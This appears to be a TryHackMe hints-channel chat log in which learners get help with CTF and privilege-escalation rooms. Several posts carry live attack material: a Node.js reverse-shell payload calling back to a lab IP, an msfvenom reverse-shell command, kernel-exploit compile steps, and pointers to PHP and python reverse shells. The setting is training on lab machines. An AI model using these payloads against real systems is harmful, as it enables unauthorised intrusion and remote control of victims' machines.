#room-hints

but it says this

there is video on offical website that will show you how exactly is needed to use. is bit different 🙂

hint is that you need extract it. and extraction is bit different 🙂

dont rush. slow you self down

AAAAAAAAAAAAAAAAAAAAAA

Too much going on already

idk i can't understand

Yes Thats it

ok... so you did sudo apt-get install borgbackup ?

I did use the Command borg extract archive.tar

and it didnt work

it needs a repo

idk if i need to create one

ok. how did you use command

Help

it worked

but i cant see where did the output file

xDDD

there's a lock.exclusive

what's taht

Wait can u help me?

i did borg extract /root:archive.txt

how did you run command?

.

not like that

list first?

might i DM you. to not spoil here

Sure

It needs to be pointed to a particular path which you will find when you extract the contents of the tar file. I only completed this room recently as well.

I finished it Ty ❤️

Gave +1 Rep to @tropic garden

I have a few question on https://tryhackme.com/room/linprivesc# task 10. I was able to complete the task but I would like if someone could help explain a couple things to me. After I ran the find command to find where I had write access why do I not have write acsess in the usr directory or its sub folders but it is listed in the command output and why do I echo "/bin/bash" into a file called thm instead of using vim or nano to write the same thing?

I am on https://tryhackme.com/room/linprivesc# and I am having so trouble on task 11. When I try and mount one of the no_root_squash shares I get an error: mount.nfs: failed to apply fstab options

This is the command I am using: mount -o rw 10.10.234.113:/backup /tmp/backupsonattackermachine mount.nfs: failed to apply fstab options

Is this still unsolved?

Anyone here ?

If you have a question, you'll get an answer faster If you just ask.

I am trying it again now

Could someone explain why I got this error
Unable to create directory /home/karen/.local/share/nano/: No such file or directory It is required for saving/loading search history or cursor positions.
When I used nano on the target machine of task 10 in Linux priv escalation.

I was typing in nano then all of a sudden it closed and this messaged displayed

Hello, I'm looking for a hint on https://tryhackme.com/room/volatility.
I am using the "Volatility Sandbox v3.8" machine, which comes with volatility & the dumps already there.
Task 10 asks to look into a couple of memory dumps. The first memory dump, we're told, has something odd going on with the ip "41.168.5.140" . However, when trying to run the volatility network plugins for a windows dump (windows.netstat & windows.netscan) volatility crashes because the windows version of the dump is not supported. Is there any other windows plugin I should be using to look for an odd connection ?

Yes this is still unresolved

Did you add sudo?

Nope, thank you! It works now

Gave +1 Rep to @lucid junco

I am on https://tryhackme.com/room/linprivesc# and I am having so trouble on task 11. After creating and compiling a script and setting the suid bit when I try to run it on the target machine I get the error:
$ ./nfs ./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

When I try to compile it on the target machine i get an error that gcc cant be found

2 question's
John and hydra ? I reset my Linux , my PC and starting from new and I like to keep order in it now. Where should hydra and John be installed ? In /bin ?

you local linux?

Chromebook, as I've been learning everything been getting mess so I reset and starting for scratch

you can type whereis hydra in terminal and will show you

No lol

Where is the best place to install it at... In my /bin or it's cool to put it in /home/user/John or hydra

Sorry for stupid questions

ah you install it manually ?

I am right now and hydra

then you can in /usr/bin/

Cool. I thought so but I wanted to ask to see if there's a cleaner way to put it so I can use it anywhere

if you can spin virtual machine will be nice also since all the tools are there

And thank you for responding. I'm trying to get my terminal nice and clean

i dont know how to make that task, the default port of ftp has changed for 10021

what room is that ?

Net Sec challenger

in general. you can change the default port of any service to the port you like

and command you running might is not correct to run like that

Put in Red as the color of the flag, no dice.

In the room where you are supposed to locate a suspicious I.P. . When the room was over you needed to answer what color flag you had gotten for following along. I answered Red, and I thought that was the correct answer.

Please D.M. me if it helps

what room is that

Can I copy/paste it here ?

the thm link room yes

https://tryhackme.com/room/defensivesecurityhq

Very bottom segment , or third segment.

let me check

Alrighty .

flags need to appear to you in format THM{xxxx} to be valid solution

Ok, so ,.. did I answer correctly; or ... what's going on, please ?

when you enter correct ip in the filed and Block IP Addres the flag will show to you

Ok.

I've been stumped on this one segment for "months".

I actually quite for a while.

you need to enter bad ip in field and block it ant gflag will show

143.110.250.149

Is this it, because even this isn't going in.

try it.

Ugh, .. it took a few tries.

Still no luck.

I just can't get through the thing.

pop-up window didnt show up when you block that ip ?

It's not the pop up window.

It's the other part where you need to fill out a question.

what was the question

Let me put something here first.

143.110.250.149

What is the flag that you obtained by following along?

did you click on that visit site

to split the screen

Yeah, and I completed it.

It was a bit of a hassle , but i completed it.

when you answer last question the popup needs to show with correct answer

when you block that ip will show you answer

This is what I'm getting.

try that as answer

Ffffffinally.

🙂

That worked , thank you.

This is kinda a hard site.

usualy all flags are in that format so to say

Wait, ... ugh, .. do I really need to subscribe ?

Please delete this flag, let's not spoil it for others.

@left thunder

Did it.

Do I really need to "Pay" in order to continue ?

when you sub, you get more things to learn

you can do free stuff with no issues

Where can I find "freeee" 😸 ?

it says Free or VIP

Ok, .. I ... might try Code Academy.

I really am just starting out, any idea where I should begin ?

#start-here

Ok, thank you.

I really want to continue learning, .. but ... I don't have money at this time.

What would I do ?

do free paths

Ok. brb

google and so on

Ok.

Thank you.

I will continue using this site though.

See ya later.

Room: Operating Systems Security......I cannot get the "su - root" to work under Johnny

any tricks?

I'm trying to do the Blue room again for practice, I have completed it already but now the Nmap script for ms17-010 doesn't give me anything it shows as filtered but before it gave a whole bunch of info. I've terminated and started new THM machines (different IP) but still keeps happening. What could be causing this? I was hoping to practice each step that I did in exact order but just be more efficient.

Wait 5-10 mins.

I've tried on 3 separate days and at different times. I have AddGuard but even when I switched it off it makes no difference. Don't know why it takes over 3 hours for these scans. I'm working through the Nmap course with Chris Greer and David Bomball and don't have these issues - but everyone here says it shouldn't take 3 hours so I don't know.

Attackbox/vm?

Both

What's your sytax?

I'm doing it now again with this syntax: sudo nmap -sS -Pn -A -p- -oN nmap.txt 10.xx.xx.xxx It's taken over 20 min still going. On my own VM 0.26%

Tbf, you're scanning all the ports with the aggressive scan.

I understand but I've seen other people also do this same scan and when I can scanme.nmap.org with all ports it doesn't take 3.5 hours. I should still be able to run nmap scipt to check for the ms17 vuln that what I did when I first did the challenge it gave me the info but now it only every shows as filtered I just wish I know what is causing this. I can try from a different computer but it's strange that it worked the first time.

I tried just scanning the one port and it worked and then launched the THM attackbox and did the one I've had issue with and it worked now. Maybe it's THM firewall 😕

Try a normal scan.

Thank you you were right, it didn't like the aggressive or all port scan. I was able to do it on the attackbox but when I try on my personal vm I only get filtered I'm going to try tomorrow change my thm openvpn and see it if helps.

Gave +1 Rep to @lucid junco

somebody can tell me, how to make that task 2 ?

ah yes that one

I'm doing the "RootMe" ctf. The last question of task 2 asks "What is the hidden directory". Out of all of these directories, which one do I know is the hidden one

there is an exploit for said room on the attackbox if shadow recalls correctly... the 3 from exploit-db never worked for shadow for some reason.... here is the file if you feel like using your own machine for the attack instead:

Thanks

no problem

one day shadow might go back and check if they can figure out how to get the other exploit scripts working

You already have the correct one here. Simply try all of them or look at the format by which you key in the answer.

Oh I see. Thanks mate! I eventually went through them all and found the right sub-directory

Gave +1 Rep to @tropic garden

I am on https://tryhackme.com/room/linprivesc# and I am having so trouble on task 11. After creating and compiling a script and setting the suid bit when I try to run it on the target machine I get the error:
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

When I try to compile on the target machine using gcc i get an error that the gcc command can not be found

I am now learning how to build a cross compiler. But any other suggestions are welcome

Not using a compatible linux architecture to create the program? (assuming the target box is x86_64/amd64, and your attackbox is also, it should let you run your simple nfs.c program described in the room)
You can always try making an ELF based exploit using msfvenom.

if you using you own local kali might be issue. try use THM attack box. might help

Hi, I am in the Pickle Rick CTF and have fuzzed the directories and files, checked if I can bruteforce ssh and tried scanning for vulnerabilites on the apache httpd server. No luck though, any tips?

You can find the ssh creds.

checking under the hood of website 🙂

Infact, you don't need the SSH

So the first thing I did was checking every page with burp suite, because of the obvious reference but I don't see anything?

Maybe the source

Damn how did I not think of that...

Thanks!

Gave +1 Rep to @lucid junco

So I think I have user and pw but I am getting permission denied on ssh?

When trying ssh <username>@$IP

you don't use ssh.

you'll need to enumerate.

aha, found something. I guess I didnt fuzz thoroughly enough.

So I tried going at it with a webshell and got this:

Should I try this direction more or am I on the wrong path?

you are in right path

So I am a bit stuck here

Can anyone help me out?

I guess I need to do a privilege escalation to read the files

Couldn't get anywhere with path or gtfobins

do some quick searching on reverse shell commands

I have also tried a bash revshell

that does not look like a php meterpreter shell command

and yeah the bash revshells tend to be a miss in a lot of situations as it requires it to be run kinda specifically

I crafted a php shell with msfvenom earlier, didn't work though?

look into python reverse shell and catching them with nc

Wow, ok I didn't try out python, python2, python3. That was my mistake. Thanks!

Gave +1 Rep to @alpine kestrel

if it runs linux is most likely has python running somewhere

Good to know!

Made it. Dang I thought this would be easier but I was pretty tough to be honest. Learned a lot though! Thanks for your help!

Gave +1 Rep to @alpine kestrel

no problem

It is not even that complicated, it is just missing the know-how on certain things which slows you down so so much.

technically the reverse shell part is just one of the easier ways to do it... think you could technically use other tech to read files using the web command line

but that is just extra learning

Yeah, I will get there at some point. Just gotta keep grinding :))

If you can get a RevSH, it makes life much easier, but yeah. Some times you'll be able to get a webshell/RCE but the system or network are configured in a way that is preventing you from getting a shell back out. (Maybe you're on a front-end server, and its communicating with a database on a back-end server with no direct Internet access?)

In that case, you can just treat the RCE as a very slow shell, assuming it gives you feed back.
If its blind, things get tougher again.

somebody can help me to make the task 5 for Linux Privilege Escalation, i dont now how i can make this

Hmm, I have notes, but not questions saved.
Link me to the room?

https://tryhackme.com/room/linprivesc

Hmm, Kernel exploits...

yess

I may not be a ton of help from my current location, but did you select a CVE to attempt?
Which one is it? I'll pull it up from my phone and see if I can understand where you're getting stuck.

CVE-2015-1328

i get it on exploit-db

and now, i can't transfer the exploit(37292.c) to target machine

have you tired using sftp to transfer the file over??? and try and put in /tmp

What kind of access do you have to the machine right now?

i don't know what is sftp

file transfer protocol using ssh:s port hence called sftp

(Like SCP, uses SecureShell to do a file transfer)

secure file transfer protocol

it lets you get and put files

shadow finds sftp easier to use then scp if you need to move a file to the target if you got an ssh connection

I'm booting the VM now on my system...

But I get the feeling at a glance that you just copy-paste the exploit code into a text, then run gcc against it in system.

then again the wget and python web server method is decently easy for most people too

Compile on the victim environment, and run exploit.

go in /tmp on target

Yep, room booted, did a POC Hello world.
So you can do that in /tmp

tmp is world read/write place

Finding where you have read/write access in a system is going to be important for a lot of exploits.

And if you compile it in place, it becomes an example of LOL as well 🙂

thank, but now, how i can make to open the 37292.c, because it is not in python

Look at the screenshot, it shows you everything you need to know 😉

Python as you're familiar with, is a scripting language. The largest difference between such and a Programming language, is compiling.
Python runs without requiring any kind of binary packaging. It remains readable.

C and other such programming languages require "compiling", a process that turns our (relatively) human readable code into machine language.
A common (but not the only) compiler aimed for "C" programs is GCC (Gnu C Compiler)

Call the program "gcc" providing a raw c-file as an argument, and it will generate a.out as above.

You can use, I believe "-o" to define your own output file name.

The output file will be compiled c code (A "binary executable")

I haven't seen any rooms on it yet, but if you want to play around with reverse engineering C code, you can make a program (Like my simple hello world above), enable the debugging flag, and the use a decomiller to get out the machine language code (Assembly, or as some refer to in this instance dis-assembly).

Which can give you a better understanding of what the computer is actually doing when it runs the code.

I got it, I used gcc, they could have said in the question about the existence of gcc

I'm lost

any time you see a .c file, that file is written in c and needs to be compiled

Hmm, I wonder if gcc is covered in any of the learning linux rooms.

There are a number of rooms that also include hints that simply say "use google"

90% of actual security work is reading and exploring documentation to put the pieces together

A big part of hacking is

yeah that.

I encourage frequent breaks so as not to burn out.
Some folks here make things look easy, some folks here also eat, breath, and sleep hacks for the last couple decades.

I know, it's just that for someone who understands English very well, searching the internet is easy, but for me I still have these problems, because I'm from Brazil, but I'm getting better with time.

hi guys

Hi I am trying to download something from a target machine using a python http server
python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ...

But when I try connect to I get this
Connecting to 10.10.133.37:8000... failed: No route to host.

any suggestions? Is this a problem with my openvpn?

Where are you connecting from.

And what are you connecting to?

Not sure I understand what you mean

I am using a vm and connected to openvpn I am trying to download a file I made on a machine back to my local one using a http server

Which machine?

https://tryhackme.com/room/linprivesc task 12

I just used scp instead

Do anyone know why the http server did not work?

If SCP works, then there's clearly a route to host.
I assume that was curl or wget that failed to connect?

somebody know how to connect the windows on kali linux with RDP ?

I need help

I'm locked in a lesson of the burp suit

Which button would we choose to send an intercepted request to the target in Burp Proxy?```
-> _forward_ **OK**

```[Research] What is the default keybind for this?

Note: Assume you are using Windows or Linux (i.e. swap Cmd for Ctrl).```

well first you capture a request... then you right click the request... then you check the command to send it to said thingy

error while ./exploting

I imagine you mean to windows since this is RDP?
xfreerdp is built in and can be launched form the command line.
xfreerdp /u:name /p:pass /v:Target-Address /cert:ignore
There are additional arguments to fine tune the experience, but that should be enough to get you connected to the majority of systems.
If you're like me you'll want to open the command with a nohup and end with &

thankss

hlw , i am doing Sea Surfer room. i already subdomain name in /etc/hosts file , but this still give default apache home page .

Should that say seasurfer.thm internal.seasurfer.thm ?

yes

Well it doesn't.

You've used intrenal

thanks , i think i have to enumerate again

Ah.

Maybe not.

I haven't done this room and didn't realise it was spelt that way.

I assumed you made an error.

that was hint to internal.seasurfer.thm

I'm doing the room windows privilege escalation, and in task 6, it seems to have some kind of error.

Something wrong with the hives you saved I think.
Try dumping them again.
I did this room I think a week or two ago.

my machine does this

i restarted it and now it works

im finish the jr penetration tester, but i dont know where i need to go now.

Web Fundamentals is a good choice

And the next ?

Offensive Pentesting

#pre-security-legacy-path 
#974406074444685322 
#junior-pentester-path 
#878393611929129000 (optional)
#pentest-plus-path (optional)
#web-fundamentals-path 
#soc-level-1-path 
#offensive-pentesting-path 
#red-teaming-path 
#791764435991658556

Thankssss

no problem

Anyone solved

Brutus box

@white salmon alright

what do you use to access a website

on your computer, you load up a what

https://tenor.com/view/-gif-3373131

what software are they using

to access the website

I prefer 1543% of 7 😛

Hi everyone !
I try to complete the Toss A Coin room, but I'm blocked.

It's a CTF room, I need to find the file root.txt

What I have :
I found ssh login to the room, I've access to one user (Jaskier) and there are 3 more users (tryhackme, geralt, yen). I successfully access to yen user, and in it's home directory there is a portal file, I put the file in ghidra to extract function from the binaries, and the main function is this

void main(void)

{
  setuid(0x3eb);
  setgid(0x3eb);
  puts("I am preparing a portal for you Geralt.");
  system("/bin/echo -n \'It will be ready in about \' && date --date=\'next hour\' -R");
  puts("You just have to wait for it");
  getchar();
  puts("Segmentation fault (core dumped)");
  return;
}

0x3eb is 1003 and the group 1003 is for geralt user.
After running the binaries "portal" nothing append and the guid et uid doesn't change even after 1hour,

So I request your help please, thanks a lot!

Is this for TryHackMe?

Yes of course, why ?

Can you link the room?

You want the link of the room ?.

Yes.

https://tryhackme.com/room/tossacoin

Is this a private room?

I'm french learner at Epitech, so maybe only epitech members can access to it

Ah!

You have an educational account?

I don't know, is it important ?

If this is an educational room, we cannot help with it, regular members won't have access to the room, you'll need to ask your peers/who ever is teaching you, about help with any of their rooms.

And whit those detail you can't give me some advices ?

I just did.

Ask your peers/teacher.

We can't do any more than that.

Already did.
Thanks for the response 😉

Have a nice day.

Sorry I can't help any further.

I'm jealous because I can't do a room based on The Witcher.

Can someone tell me why this command did not work on the wind priv room
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server

https://tryhackme.com/room/windowsprivesc20

Hello, I am trying the new obscured room, I was wondering if someone could give me hint, based on a single word as I am unsure if I should continue my current route or not. (Don't want to spoiler as it is very new, so DM works as well)

Have to wait 72 hours after release. 🙂

Ok thanks tim. I am just going to wait. I am pretty sure I am using the intended way of exploit but 3 machine restarts and various tinkering didn't help.

Gave +1 Rep to @hexed crescent

Hi all, I have a problem with the room. I have finished this room, but it's not done.

It's a known issue, they're working on it #1092490706385383524

Hi all, I need some support on completing the upload vulnerabilities room, task 11. I was able to upload a reveres JS shell file with its file extension changed to .jpg(the file extension was changed to jpg to counter the MIME filter on the server), the gobuster scan shows that the file is stored in the /content folder. After these steps , I had setup the netcat listener and tried to launch the shell via the admin page using the command ../content/<filename> but the page returned an error which says module does not exist. I don't know why this error should be returned by the server as the file upload was successful . Need some help to solve this

can you give me some hints about these questions? Where can I find the answer or smth?

Is this GoBuster?

Can some one help ?

No it's from Networking Services 2 room

Are you in msf?

https://www.offsec.com/metasploit-unleashed/scanner-smtp-auxiliary-modules/

Checkout the documentation

By changing the file extension, did you append .jpg or changed it all together? Also, did you visit or browse to the directory to see if your upload was successful?

I did a go buster scan after uploading the shell and confirmed that file was indeed uploaded in the content folder, the shell was uploaded with a .jpg file extension this was done by changing the extension in the burp suite intercepted request.All the client side filters were disabled before performing these steps.

I meant if you uploaded it as filename.js.jpg or filename.jpg? I'm not sure if uploading it as filename.jpg would still trigger the reverse shell

I uploaded the shell as filename.jpg

Have you tried filename.js.jpg? And try browsing to it again?

Hey guys, I'm working on the mustacchio room and was wondering if anyone can give me a nudge. I was able to gain access to the admin page in port 6xxx or 5xxx (not in my computer atm) and saw the clue for the user Bxxxx to login to the server via ssh using his key. I wanted to know if I need to supply the correct XML code to output user Bxxxx's private key or should I look somewhere else?

Keep going.

Got it. Thanks!

Gave +1 Rep to @young gulch

will try it out, thanks 🙂

Gave +1 Rep to @tropic garden

I'm also working on the EasyPeasy box, and I'm stuck and need a nudge on the part right after bruteforcing the hash.. I've no idea how to use the password that I got or how to proceed. I did directory bruteforcing multiple times using different tools and wordlists, but seem clueless as to what to do next, tried to look for a vulnerability or exploit on the OS (on both Apache and nginx) and still nothing.

check the files available to you

something might be hidden

Will look at those again. Thanks!

Gave +1 Rep to @young gulch

@tropic garden I uploaded the file with extension as filname.js.jpg. Gobuster scan shows the file is present in /content dir, but not able to launch the shell from the admin page with the command ../content/filename.js.jpg, the error is module does not exist

I managed to complete the room, but had to look at a writeup in the end. What happened was that it didn't occur to me to use the password that I got from the hash even though I was being asked for it when running the command s------e info filename.

Dunno why it didn't though.

ssh tunneluser@10.50.69.171 -R 8888:thmdc.za.tryh
ackme.com:80 -L :6666:127.0.0.1:6666 -L:7878:127.0.0.1:7878 -N task 7 am i meant to know the password for this
[9:43 AM]
ive set up a listner using metasploit but this command wont run without a password not too sure

on lateral movement and pivoting task 7 really need some help

What is the content of your reverse shell payload? I'll check and see if I can execute this and get back to you

Might take time though as I am only about to start the room

@tropic garden I used a revers Java shell code as payload .

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4242, "10.10.38.69", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
this is the payload which I used

I'm currently doing steel mountain task 2, part 4 and having a little bit of difficulty with the start. I'm kinda lost on what I should do. My hint is telling me to use metasploit to get a shell, I downloaded the vulnerability from exploit db (previous question) which is a python script that targets a certain IP / Port and it isn't working either. to run the python script that targets the vulnerability this webserver has the syntax is "python Exploit.py IP Port" and I'm running that but getting errors. I have a nc listening on the same port. So I figured that the script might not be what I'm supposed to do to get my initial access and starting messing with metasploit but feel kinda lost atm. Looking for a little hint please. edit @ me please if you respond.

Okay, could you share the URL to the exploit-db script/vuln that you're trying to use? Worth putting it in spoiler tags like || URL here ||🙂

|| https://www.exploit-db.com/exploits/39161 ||

Okay, so that exploit is for python2. Are you using that version of python to run it?

you should be able to do search cve-bleh-blah in metasploit to find a metasploit module to attack it

if that is the way you wanna do it

I didn't know you could do that, i'm def not comfortable with metasploit yet

given the way the questions are worded I'm kinda guessing that was the intended path

that or searchsploit 🙂

and no I was just running python x ip port

yeah that would probably not work because of python version differences then

okay, so that could be either python2 or python3 depending on what you have installed and configured as the "default" python. If you were to run python you should see if it is either python2 or python3

the last task in that room talks about how you would go about not using metasploit for it

how did you know the version of python is different? I'm not super experienced with that for python

does my reading comprehension suck and I just missed a line or?

A good indicator is knowing the difference between how python2 and python3 looks. At a quick glance, I can see the print statements. print "HelloWorld" for example is python2, python3 is `print("Hello World")

think you can look at the shebang at the top or how the print statements are written but unsure

okay so it's a lack of experience? edit; on my part

Syntax is the biggest one. Python2 will allow what Ben said, python3 will allow it but tell you it's deprecated

you can look at the shebang, but in this case, it just looks for /usr/bin/python which could either be python2 or python3 depending on what you have installed and configured as the "default" in your path

yeah.....

Experience perhaps yeah. Definitely gets easier as you get more familiar with things. It's also just knowing if that makes sense?

yeah

Like in this case, if you're not familiar with python, you're not going to know. Same with any exploit script in any language

must acquire more knowledge

We all start somewhere, you'll be a wizard in no time!

I've coded in python but not nearly enough to know the difference in versions.

I would suggest, if you want to complete the room, and you're not familiar with diagnosing vulnerability scripts or environments, looking for metasploit modules would be a good avenue to go with, and you can research into how these scripts by learning the language they're written in 🙂

thank you all!

You are most welcome!

Gave +1 Rep to @steady stratus

Yup 😄 it's literally just an experience/exposure thing in this case 🙂 now you know what to look for! Older scripts such as in this case are likely to be written in python2. There's more signs/syntax you can look at to determine if it's written in python2 or python3, but for me, just looking at the difference between print statements is the quickest

Okay, so in instances I'm using older exploits I might need to be aware of the version of code that the exploit was designed to work with

that makes sense

Precisely that yup - that and understanding that how you're running it may not be the way it's compatible with 🙂

same applies for older and newer exploits

if you're running code with a newer version of python that's compatible with an old version of say python, you're gonna have problems. If you're running newer exploits with an old version of python (i.e. python2) that are compatible with newer versions of python (i.e. python3), then you're also going to have problems

It's going to be a case of either:

1. re-writing the exploit to be compatible with your environment (not always ideal)
2. finding alternative exploits/scripts that is compatible with your environment
3. changing your environment or the way you're running the exploit to make it compatible

4. knowing how to use virutal enviroments and pyenv to run specific python versions
5. using the exploit from a container like docker

yup ^^^^^

virtual environments exist for ruby too but that is just an extra learning opertunity

probably lua virtual environments out there too but not used that yet

sed 's/learning/headache/g' 😄

lol accurate

+rep @alpine kestrel

Gave +1 Rep to @alpine kestrel

do me a favour and +rep hex for me please shadow 😄

silly rep cooldown

+rep @distant grail

Gave +1 Rep to @distant grail

ta 😄 I would rep you for that but

yeah limits

+rep

Gave +1 Rep to @steady stratus

🙂

hmm I'm having trouble getting the msfvenom payload to work

|| msfvenom -p windows/shell_reverse_tcp LHOST=10.10.175.117 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe|| is the payload the room has me create, but I don't think it's correct. I'm supposed to replace ASCService.exe with my payload and then restart the program which will trigger my payload right?

[*] Uploading : /root/ASCService.exe -> ASCService.exe
[-] core_channel_open: Operation failed: The process cannot access the file because it is being used by another process.

Just finished the tomghost room and absolutely loved it. ||The last flag hints that there's a fake zip file. Is there a potential extra task that I can do / easter egg I'm missing? Or am I reading too much into the flag?|| HIGHLY recommend this room, it's excellent.

https://tryhackme.com/room/tomghost

this was a good room, just did it yesterday - I didn't know you could use a certain tool on an image... had to look at a walkthrough...

Please put hints in spoiler tags || hints here || to not be read by non hints-seekers by accident

done - thanks for the heads up

Gave +1 Rep to @oak summit

Thanks to you too :)

Gave +1 Rep to @lunar inlet

For https://tryhackme.com/room/windowsprivesc20 task 6 why do we need to back up both the system and sam hives

I believe this is because the SAM registry hive contains the account information but this information is encrypted with the SysKey. Syskey is stored in the SYSTEM hive.

Source: https://www.praetorian.com/blog/how-to-detect-and-dump-credentials-from-the-windows-registry/

Hey, has anyone had any luck with the java ver. required for you're in a cave room? The web server is returning the serialized object correctly but nc wont pick up a connection when I sent it to the 3333 service

hi, I am in nmap room, task 14. It asked me to do a Xmas scan on first 999 ports. I did "sudo nmap -vv -sX -p1-999 <ip>" and I got all 999 closed ports. It asks me why? but I couldnt find the answer, can u help me?

"There is a reason given for this -- what is it?

Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!"

oh ok, I needed openvpn connection... problem solved

hi, iam trying this room. but got stuck in the admin page. from here, iam guessing its the place for XXE payload.
tried multiple ones, most were basics one got from owasp and some other resources, but none worked.
A hint for where to look from here, will be appreciated, thank you.
https://tryhackme.com/room/mustacchio

I'm stuck in the exact same step myself...

the issue, is that we didn't know the basics of XML.
the children tag is used to replace value in HTML tag.
if you applies that into the XML code, then you can process the request.

you can pass down the value to name, author and comment.
so you are retrieving a info from the system, and passing down to an element

if you specify that element inside the XML, the value will get pass to that element down to HTML

I'm reading on XML bit by bit, but can't seem to grasp where I am getting it wrong.. I saw the || Example=/auth/dontforget.bak || and playing around the query using the said pattern, but still not getting anything.

you are in the phase of xxe in the admin page right?

Yes, the sample I was referring to is located in the || text/javascript || portion of the source.

but did you see a comment below it, refering to a user?

Yes, it I updated my earlier reply so you can check.

i got what you referring to.
but there is actual "comment" referring to a user in those html

did you see it

<!-- --> this is the comment format in html

Yes, I saw it, but still can't figure out the exact content to put in.

ok
so i assume, that you tried a brute force for ssh/ put something to login to barry.
when doing thtat, you would notice an error in ssh, that its not "passwrod based authentication".
meaning you will need the barry's id_rsa for logging in through ssh.
that id_rsa is our target.
we need to use the XML to retrieve the private key of barry from the machine

for XML, i will give a hint/example.
you have a HTML tag named "place".
and you created a xml with prologue of XML and other necessary tabs.
after that in the XML, if you wrote
<place>canada</place>
when you run this/submit it
this values will get pass through as the "place" HTML tags value

did you get some idea about it?

I did that previously and thus trying to get the || id_rsa key || via that field. Not sure if I'm complicating it too much though.

can you share your xml code?

I'll have to check it tomorrow as its almost 2AM here.

kind of confused on what his task 2 for abusing windows internals hasnt really explained anything to get the flag

this

Hi Everyone, I am new to this platform. I am try module of Metasploit. The last question in section “ Scanning “ is asking for the password. I tried smb_login and got the password but out of curiosity I attempted trying brute force using hydra with the given wordlist but it is not able to return any password match. I even tried just passing the correct password even then hydra says 0 valid passport. Can anyone let me why we observe this behaviour ???

What was your hydra command?

Hi guys is there anyone else having issues with the Pyramid of Pain room task 9? The one where you drag and drop the answer onto the pyramid. I Thought i Was doing it properly and even went back to look at the previous tasks but when i click check answers its still says "whoops check your answers"

all good solved

Please delete the flag, not to ruin it for other users.

any hints on gatekeeper room

i managed to get user access on machine but idk where to privesc from here

Working on the Metasploit: Exploitation room, is eternalblue supposed to hang on [*] 10.10.183.104:445 - Sending all but last fragment of exploit packet for forever?

Did you set the LHOST?

LHOST => 10.13.26.18
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg LPORT 4567
LPORT => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

I set it to the IP on the corner of my screen (using a kali VM), not sure if that's correct or not

I didn't change the lport.

Have also tried it with the default port

4444

Just got a warning that I'm running low on time despite having ~1:30:00, happened before on the same room

TCP handler is binding fine

EternalBlue is notorious for not working after a few failed attempts.

I'd restart the box.

Have done it a few times

Does it need the attack box?

No.

About how long should it take?

I'm not getting a fail, just eternal waiting

Not sure if you have already beaten this room しion but it's best to try and run the exploit with Metasploit correctly the first time. That's the only way I've even managed to exploit eternal blue. It's like a 1 shot exploit or something.

Still nope

Going through the basic room, rootme, and I'm having trouble getting the shell I upload to execute. Anyone able to offer some pointers to get me in the right direction? Thanks.

What is the extension?

Talkin to me?

You asked a question... xD

lol Fair.

Extension to the file I uploaded? *.phtml. I got the site to take the upload successfully. When I set my nc to listen then click the script from /directory, the site just loads the script instead of running it for nc to pickup.

What happens when you start the nc first?

Then upload and click?

$nc -lvnp 4444
listening on [any] 4444 ...

What's your target ip?

Then I click the file form /directory. Then the site loads the script as text instead of executing.

The target IP is the room IP that loads after 60s.

I know what the target is, I'm asking what it actually is. lol

As in, give me the ip. lol

🙂 Thought you were confirming how smart I was lol. IP 10.10.26.74

https://asciinema.org/a/584475

It worked immediately for me.

You look like you're using the wrong IP.

Hmm.

Are you on the attackbox?

Or your VM?

Neg. VM.

You need to use the IP of the tun0 to catch your Rev shell.

So tun0 would be target in the script? Or am I misunderstanding?

It's not the "target"

But what you have is looking you're trying to connec to port 4444 on the IP of 10.10.24.74

But your tun0 should always be used to catch any reverse shells in THM.

If nc is used to listen, I dont know how to "use" tun0 to catch the shell. Based on my limited understanding, nc is catching it, right?

nc is catching it yes.

But it's listening on your VM, and since it's via THM it will come through the 10.10 subnet.

For example, my tun0 10.1.2.3

──(scrubz㉿KoopasCastle)-[~]
└─$ nc -lvp 9001
listening on [any] 9001 ...

nc is listneing on 10.1.2.3 (and I'm sure my eth0, someone will correct me if im wrong) on port 4444.

As I read that, simply changing to port points the "catch" from eth0 to tun0. I feel like I'm missing something haha.

No, that's it.

How's that work? Why does port # change the receipt IP?

Oh no, not the port.

the ip.

I'm making a mess of explaining this.

lol At least you're trying. My ignorance doesn't help either. I appreciate the effort.

The easiest way to explain it, is to do it.

have you ever used pentest monkey?

Are you saying I need make nc use my tun0?

Nah.

nc will listen on both interfaces.

Ok. And, no, I've never used pentest monkey

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Use that script.

Only change these parts

Set the ip to whatever your tun0 is.

And set a port in the 9000's

Save it as a phtml extension too

Did that. Still nothing. F.

try .php5

No dice. This is the output I get on the VM...

Did you set yout NC to 9001 first?

Yup. Set that. Went to site, uploaded. Clicked new file. Got that result on the site. Neg results on nc.

Ok, set a new nv for 9005

Let me know when you're done

Changed. Uploaded. Set nc. Clicked. No dice.

I wanted to try something, is nc still open?

Mine? No. Will reopen.

Reopened on 9005

rec'd

Did you get a shell?

Yup

Yeah, I think it's the script you're trying

yeah there's something wrong with the script, when you click the upload it should hang instead of showing that text output

did this one yesterday I'll try to find the script I used one sec

Thats what I expected. Thats what I've seen on vid walkthroughs. Mine wasn't hanging.

That's why I directed you towards pentest monkey.

That one will come in handy for alot of stuff you need to catch.

I literally copied that, input the required data, and saved. lol

The full script?

Still did't work

Cat your script for me, and show me the output

there's a preinstalled php revshell on kali if you go to /usr/share/webshells/php, you could try that one

just copy it, change the ip/port values and make the extension .php5

They have a shell now, I uploaded one for them.

To show it can be done.

Now we need to teach them what we used. 🙂

I got a shell. I think I figured out what I was doing wrong. Scrubz said "the full script." I only cpied the specific lines in the middle with the data points you need to change. I copied the entire thing, saved, upload, nc, click, profit.

/faceplam

oh lmao yeah, you didn't have the <php tags in that case

It's all a learning experience.

Yea lol. Well, thanks for riding the struggle bus with me y'all. Now I gotta get through the priv escalation. 🙂

gl

yee yee

